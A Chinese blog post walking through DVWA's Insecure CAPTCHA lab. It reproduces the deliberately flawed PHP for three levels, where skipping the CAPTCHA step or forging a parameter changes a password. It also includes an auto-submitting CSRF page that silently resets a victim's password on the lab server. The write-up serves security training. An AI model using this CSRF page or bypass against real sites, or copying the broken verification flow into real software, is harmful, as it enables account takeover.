DVWA1.8全级别之Insecure CAPTCHA

最新推荐文章于 2022-03-12 16:20:41 发布
最新推荐文章于 2022-03-12 16:20:41 发布
阅读量182 收藏 1
点赞数 1
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46938584/article/details/110294081
版权

DVWA全级别之Insecure CAPTCHA

Insecure CAPTCHA

不安全的验证流程,这块主要是验证流程出现了逻辑漏洞。

reCAPTCHA验证流程

这一模块的验证码使用的是Google提供reCAPTCHA服务,下图是验证的具体流程。
在这里插入图片描述
服务器通过调用recaptcha_check_answer函数检查用户输入的正确性。
recaptcha_check_answer($privkey,$remoteip, $challenge,$response)
参数$privkey是服务器申请的private key ,$remoteip是用户的ip,$challenge 是recaptcha_challenge_field 字段的值,来自前端页面 ,$response是 recaptcha_response_field 字段的值。函数返回ReCaptchaResponse class的实例,ReCaptchaResponse 类有2个属性 :

$is_valid是布尔型的,表示校验是否有效,
$error是返回的错误代码。

下面对三种级别的代码进行分析。

LOW

服务器端核心代码:

<?php

if( isset( $_POST['Change'] ) && ( $_POST['step'] == '1' ) ) {
    
    $hide_form = true;
    $user = $_POST['username'];
    $pass_new = $_POST['password_new'];
    $pass_conf = $_POST['password_conf'];
    $resp = recaptcha_check_answer ($_DVWA['recaptcha_private_key'],
        $_SERVER["REMOTE_ADDR"],
        $_POST["recaptcha_challenge_field"],
        $_POST["recaptcha_response_field"]);

    if (!$resp->is_valid) {
        // What happens when the CAPTCHA was entered incorrectly
        echo "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";
        $hide_form = false;
        return;    
    } else {
            if (($pass_new == $pass_conf)){
            echo "<pre><br />You passed the CAPTCHA! Click the button to confirm your changes. <br /></pre>";
            echo "
            <form action=\"#\" method=\"POST\">
                <input type=\"hidden\" name=\"step\" value=\"2\" />
                <input type=\"hidden\" name=\"password_new\" value=\"" . $pass_new . "\" />
                <input type=\"hidden\" name=\"password_conf\" value=\"" . $pass_conf . "\" />
                <input type=\"submit\" name=\"Change\" value=\"Change\" />
            </form>";
            }    

            else{
                    echo "<pre> Both passwords must match </pre>";
            $hide_form = false;
            }
    }
}

if( isset( $_POST['Change'] ) && ( $_POST['step'] == '2' ) ) 
{
    $hide_form = true;
        if ($pass_new != $pass_conf)
        {
                echo "<pre><br />Both passwords must match</pre>";
        $hide_form = false;
                return;
        }
        $pass = md5($pass_new);
        if (($pass_new == $pass_conf)){
               $pass_new = mysql_real_escape_string($pass_new);
               $pass_new = md5($pass_new);

               $insert="UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
               $result=mysql_query($insert) or die('<pre>' . mysql_error() . '</pre>' );

               echo "<pre> Password Changed </pre>";
               mysql_close();
        }

        else{
               echo "<pre> Passwords did not match. </pre>";
        }
}

?>

可以看到,服务器将改密操作分成了两步,第一步检查用户输入的验证码,验证通过后,服务器返回表单,第二步客户端提交post请求,服务器完成更改密码的操作。但是,这其中存在明显的逻辑漏洞,服务器仅仅通过检查Change、step 参数来判断用户是否已经输入了正确的验证码。

漏洞利用

1、首先输入密码,点击Change按钮,抓包,更改step参数绕过验证码:
在这里插入图片描述
修改密码成功。
2.由于没有任何的防CSRF机制,我们可以轻易地构造攻击页面,页面代码如下:

<html>      

<body onload="document.getElementById('transfer').submit()">        

  <div>    

    <form method="POST" id="transfer" action="http://192.168.153.130/dvwa/vulnerabilities/captcha/">     

		<input type="hidden" name="password_new" value="password">

		<input type="hidden" name="password_conf" value="password">     

		<input type="hidden" name="step" value="2"      

		<input type="hidden" name="Change" value="Change">        

	</form>        

  </div>        

</body>

</html>

当受害者访问这个页面时,攻击脚本会伪造改密请求发送给服务器。在这里插入图片描述

美中不足的是,受害者会看到更改密码成功的界面(这是因为修改密码成功后,服务器会返回302,实现自动跳转),从而意识到自己遭到了攻击。

Medium

服务器端核心代码:

<?php
if( isset( $_POST['Change'] ) && ( $_POST['step'] == '1' ) ) {
    
    $hide_form = true;
    $user = $_POST['username'];
    $pass_new = $_POST['password_new'];
    $pass_conf = $_POST['password_conf'];
    $resp = recaptcha_check_answer($_DVWA['recaptcha_private_key'],
        $_SERVER["REMOTE_ADDR"],
        $_POST["recaptcha_challenge_field"],
        $_POST["recaptcha_response_field"]);

    if (!$resp->is_valid) {
        // What happens when the CAPTCHA was entered incorrectly
        echo "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";
        $hide_form = false;
        return;    
    } else {
            if (($pass_new == $pass_conf)){
            echo "<pre><br />You passed the CAPTCHA! Click the button to confirm your changes. <br /></pre>";
            echo "
            <form action=\"#\" method=\"POST\">
                <input type=\"hidden\" name=\"step\" value=\"2\" />
                <input type=\"hidden\" name=\"password_new\" value=\"" . $pass_new . "\" />
                <input type=\"hidden\" name=\"password_conf\" value=\"" . $pass_conf . "\" />
                <input type=\"hidden\" name=\"passed_captcha\" value=\"true\" />
                <input type=\"submit\" name=\"Change\" value=\"Change\" />
            </form>";
            }    

            else{
                    echo "<pre> Both passwords must match </pre>";
            $hide_form = false;
            }
    }
}

if( isset( $_POST['Change'] ) && ( $_POST['step'] == '2' ) ) 
{
    $hide_form = true;
    if (!$_POST['passed_captcha'])
    {
                echo "<pre><br />You have not passed the CAPTCHA. Bad hacker, no doughnut.</pre>";
        $hide_form = false;
        return;
    }
        $pass = md5($pass_new);
        if (($pass_new == $pass_conf)){
               $pass_new = mysql_real_escape_string($pass_new);
               $pass_new = md5($pass_new);

               $insert="UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
               $result=mysql_query($insert) or die('<pre>' . mysql_error() . '</pre>' );

               echo "<pre> Password Changed </pre>";
               mysql_close();
        }

        else{
               echo "<pre> Passwords did not match. </pre>";
        }
}
?>

可以看到,Medium级别的代码在第二步验证时,参加了对参数passed_captcha的检查,如果参数值为true,则认为用户已经通过了验证码检查,然而用户依然可以通过伪造参数绕过验证,本质上来说,这与Low级别的验证没有任何区别。

漏洞利用

1.可以通过抓包,更改step参数,增加passed_captcha参数,绕过验证码。
在这里插入图片描述
2、仍然可以进行CSRF攻击。

High

服务器端核心代码:

 <?php
if( isset( $_POST['Change'] ) && ( $_POST['step'] == '1' ) ) {
    
    $hide_form = true;
    
        $pass_new = $_POST['password_new'];
    $pass_new = stripslashes( $pass_new );
    $pass_new = mysql_real_escape_string( $pass_new );
    $pass_new = md5( $pass_new );

        $pass_conf = $_POST['password_conf'];
        $pass_conf = stripslashes( $pass_conf );
    $pass_conf = mysql_real_escape_string( $pass_conf );
    $pass_conf = md5( $pass_conf );
    
        $resp = recaptcha_check_answer ($_DVWA['recaptcha_private_key'],
        $_SERVER["REMOTE_ADDR"],
        $_POST["recaptcha_challenge_field"],
        $_POST["recaptcha_response_field"]);

    if (!$resp->is_valid) {
        // What happens when the CAPTCHA was entered incorrectly
        echo "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";
        $hide_form = false;
        return;    
    } else {
                // Check that the current password is correct
        $qry = "SELECT password FROM `users` WHERE user='admin' AND password='$pass_curr';";
        $result = mysql_query($qry) or die('<pre>' . mysql_error() . '</pre>' );
                
                if (($pass_new == $pass_conf)  && ( $result && mysql_num_rows( $result ) == 1 )){
                       $insert="UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
                       $result=mysql_query($insert) or die('<pre>' . mysql_error() . '</pre>' );

                       echo "<pre> Password Changed </pre>";
                       mysql_close();
                }

                else{
                       echo "<pre> Either your current password is incorrect or the new passwords did not match. Please try again. </pre>";
                }
    }
}
?>
jnu_issc_zrx
关注
专栏目录
DVWA靶场练习六—Insecure CAPTCHA
afei001
05-10 394
CAPTCHA介绍 Captcha本来是谷歌提供的一种用户验证服务,称为:Completely Automated Public Turing Test to Tell Computers and Humans Apart (自动区分计算机和人类的图灵测试)。Insecure CAPTCHA,意思是:不安的验证码。 afei 这里需要翻墙,才能出来Google reCAPTCHA验证。显示网站密钥无效。可能靶场环境有点问题,反正是要绕过的,可忽略。 ...
DVWA Insecure CAPTCHA
部分学习记录
09-22 266
low 审查源码发现其只是通过对参数change和step的检查来修改密码,可以利用burp抓包绕过 medium 审查源码发现虽然对是否输入验证码进行了检查,但是并未对参数passed_captcha进行检查,可以通过burp将该参数修改为为true·来绕过检测 high 审查源码发现除了验证码以外,如果post提交的参数g-recaptcha-response=hidd3n_valu3且HTTP_USER_AGENT=reCAPTCHA时,同样可以绕过,所以依然可以利用burp抓包修改 ...
DVWA--Insecure CAPTCHA(不安的验证码)(难度)
wwxxee
02-20 627
DVWAInsecure CAPTCHA(不安的验证码) Insecure CAPTCHA,意思是不安的验证码,CAPTCHA是Completely Automated Public Turing Test to Tell Computers and Humans Apart (自动区分计算机和人类的图灵测试)的简称。 逻辑 这一模块的验证码使用的是Google提供reCAPTCHA服务,下图是验证的具体流程。 服务器通过调用recaptcha_check_answer函数检查用户输入的正确性。
DVWA1.8级别之CSRF
weixin_46938584的博客
10-10 220
DVWA级别之CSRF CSRF(Cross-site request forgery) CSRF,称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。 下面对3种级别的代码进行
DVWA——Insecure CAPTCHA(不安验证码)
qq_45780190的博客
05-13 509
DVWA——Insecure CAPTCHA(不安验证码) 验证码最大的作用就是防止攻击者使用工具或者软件自动调用系统功能 就如Captcha称所示,他就是用来区分人类和计算机的一种图灵测试,这种做法可以很有效的防止恶意软件、机器人大量调用系统功能:比如注册、登录功能。 我们前面讲到的Brute Force字典式暴力破解,就必须要使用工具大量尝试登录。如果这个时候系统有个严密的验证码机制,此类攻击就无计可施了。 LOW 服务器端核心代码: <?php // 步骤1 if( isset( $_
DVWA Insecure CAPTCHA(不安的验证码)等级
柠檬i的博客
12-19 1053
Insecure CAPTCHA(不安的验证码) 目录:Insecure CAPTCHA(不安的验证码)1. Low2.Medium3. High4.Impossible 加载验证码需要向Google申请验证码API。由于大陆地区访问不了Google,所以无法获取到验证码,所以需要耐心等待访问Google超时时间才能做本题。 1. Low 可以看到,服务器将改密操作分成了两步,第一步检查用户输入的验证码,验证通过后,服务器返回表单,第二步客户端提交post请求,服务器完成更改密码的操作。但是,这其中存在
dvwa靶场之Insecure CAPTCHA(不安的验证码)
m0_63314341的博客
02-12 4295
刚进去你可能看到这样的报错,这是因为我们没有申请密钥,需要手动输入密钥,我们根据红框提示找到文件添加密钥即可 现在我们来看一下low级别 当我们输入两次密码后他会进行一个验证码校验,验证通过后便会出现四个值,我们可以抓包看一下 我们将step的值改为2后再次发送即可校验通过 下面我们来看一下medium级别 这次变成了五个值,我们依旧是抓包将值改为他所要求的即可 下面我们来看一下high级别 这下加入了$_POST['g-recaptcha-response']...
5、DVWA、Vulnerability: Insecure CAPTCHA
qq_44598397的博客
09-25 867
5、Vulnerability: Insecure CAPTCHA 以上代码的作用为判断新的代码和验证的代码是否相同,相同则更改成功,否则报错。 具体函数可参考暴力破解: 主要用处之一有:mysqli_real_escape_string()会将转义特殊字符,一定程度上防止SQL注入。 Low 这里我们还是直接来看代码 1、服务器通过调用recaptcha_check_answer函数检查用户...
DVWA关卡6:Insecure CAPTCHA(不安的验证码)
m0_54899775的博客
12-07 1481
DVWA关卡6:Insecure CAPTCHA(不安的验证码)
DVWAInsecure Captcha
谢公子的博客
08-05 5432
Insecure CAPTCHA Insecure CAPTCHA,意思是不安的验证码,CAPTCHA是Completely Automated Public Turing Test to Tell Computers and Humans Apart (自动区分计算机和人类的图灵测试)的简称。但个人觉得,这一模块的内容叫做不安的验证流程更妥当些,因为这块主要是验证流程出现了逻辑漏洞,谷歌...
DVWAInsecure CAPTCHA(不安的验证码绕过)
shmilyzmy的博客
10-22 1237
low 1.首先在burpsuite中打开代理,即图中的第一步,登录dvwa 2.修改安等级 ,分析源码 3.返回burpsuite开启代理之后,回到dvwa界面,(切记记住输入的密码)点击change提交,之后再返回burpsuite,可看见服务器返回的表单 检查用户输入的验证码,验证码通过后服务器返回表单 客户端提交post请求,服务器完成更改密码的操作 选后鼠标右击,点击send to repeater medium 前面步骤...
#笔记(二十七)#dvwa漏洞Insecure CAPTCHA 小结
vircorns的博客
02-23 566
Insecure CAPTCHA
DVWA平台v1.8-SQL注入(low级别)
andiao1218的博客
11-26 433
代码 <?php if(isset($_GET['Submit'])){ // Retrieve data $id = $_GET['id']; $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; ...
DVWA11_Insecure CAPTCHA(不安的验证码)
weixin_44193247的博客
03-12 3522
DVWA漏洞复现练习篇
ssm9293农家乐管理系统.zip
最新发布
09-28
技术选型 【后端】:Java 【框架】:ssm 【前端】:vue/jsp 【JDK版本】:JDK1.8 【服务器】:tomcat7+ 【数据库】:mysql 5.7+ 包含:项目源码、数据库脚本、项目功能介绍文档等,该项目源码可作为毕设使用。 项目都经过严格调试,确保可以运行! 具体项目介绍可查看博主文章
基于SpringBoot和Vue的青锋后台管理系统设计源码
09-28
该源码是一款基于SpringBoot和Vue构建的青锋后台管理系统,集成了371个文件,涵盖148个Java源文件、85个Vue组件、58个JavaScript脚本、23个XML配置、12个FTL模板、7个XLS表格、5个属性文件、3个JSON配置、3个HTML页面和3个LESS样式表。系统以SpringBoot为核心框架,结合layui和Activiti工作流,具备代码生成器、自定义表单和拖拽可视化报表大屏等功能,为用户提供了一个功能齐、易于扩展的脚手架平台。尽管开源代码可能存在不足,但欢迎广大开发者提出宝贵意见。
基于51单片机太阳能锂电池充电电压电流检测液晶显示设计(毕业设计)
09-28
本设计由STC89C52单片机+LCD1602液晶显示电路+A/D转换芯片PCF8591电路+电压检测电路+电流检测电路ACS712-5A+继电器控制电路+电源电路设计而成。 功能描述: 1、通过太阳能电池板给锂电池充电,通过单片机检测太阳能给电池的充电电压和充电电流,并在1602液晶上显示出来! 2、通过继电器,有过压保护,当锂电池充电电压超过了4.5V或者充电电流超过1A,继电器断开,充电停止。 资料包含: 程序源码 电路图 任务书 答辩技巧 开题报告 参考论文 系统框图 程序流程图 使用到的芯片资料 器件清单 中期报告 等等资料
外鼻梁条超声焊接机_三维3D设计图纸.zip
09-28
外鼻梁条超声焊接机_三维3D设计图纸.zip
基于PHP+JavaScript+CSS的爱宠狼人杀后台服务设计源码
09-28
本项目是一款基于PHP、JavaScript和CSS的爱宠狼人杀后台服务设计源码,总文件量为176个,其中包括124个PHP文件、12个Git忽略文件、5个JSON文件、4个JavaScript文件以及各类字体和图标文件。该系统专为爱宠狼人杀游戏的后台管理设计,旨在提供高效便捷的管理服务。
dvwa级别通关教程
06-20
本教程将介绍如何通过级别通关DVWA。 第一步是将DVWA设置为“high”级别。这可以通过登录到DVWA控制台并选择“设置”进行设置。这将增加漏洞的难度,其中包括需要更深入的SQL注入和更高级的漏洞。 第二步是先从...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值